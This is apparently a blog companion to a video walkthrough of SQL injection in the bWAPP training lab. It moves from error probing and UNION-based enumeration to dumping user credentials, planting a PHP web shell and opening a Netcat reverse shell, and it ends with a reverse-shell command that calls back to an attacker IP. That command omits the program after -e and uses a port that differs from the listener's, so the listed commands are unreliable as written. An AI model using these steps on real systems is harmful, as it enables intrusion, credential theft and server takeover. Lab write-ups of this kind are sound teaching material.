Premise

In this post walk-through, we demonstrated how to conduct security testing for SQL Databases deployed to operate search fields. Specifically, we tested MySQL instance deployed on bWAPP for demonstration purposes.

Skills Learned

  • bWAPP
  • OWASP
  • SQL Injection
  • MySQL

First, I’ll show you how to determine if a search box is vulnerable to SQL injection. By simply entering a single quote (') into the search field, we can trigger a SQL syntax error. This error message not only confirms the vulnerability but also reveals the type of database being used, which in this case is MariaDB.

Next, I’ll explain the structure of the backend SQL query that the application is likely using. Understanding this query is crucial for crafting our attack. The query probably uses the LIKE operator with wildcard characters (%) to search for movies in the database.

With this knowledge, I’ll demonstrate how to determine the number of columns in the database table. This is a critical step in any SQL injection attack. I’ll use a UNION SELECT statement and incrementally add columns until the error message disappears. In our case, we’ll find that there are seven columns.

Once we know the number of columns, we can start extracting valuable information from the database. I’ll show you how to retrieve the following:

  • Database Name: Using the database() function.
  • Database Version: Using the version() function. This information can be used to find known exploits for that specific version.
  • Table Names: By querying the information_schema.tables.
  • Column Names: By querying the information_schema.columns for a specific table, such as the “users” table.

After mapping out the database, I’ll show you how to dump user credentials, including usernames and hashed passwords, from the “users” table.

Finally, I’ll demonstrate the ultimate goal of our attack: achieving a reverse shell. I’ll inject a PHP code snippet to create a web shell, which will allow us to execute commands on the server. I’ll then set up a Netcat listener on my machine and use the web shell to establish a reverse shell connection, giving me full control over the system.

Technical Commands

Here are all the technical commands that I used in the video:

  • nc -lvp 455
  • whoami
  • netcat 192.168.1.7 4545 -e

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles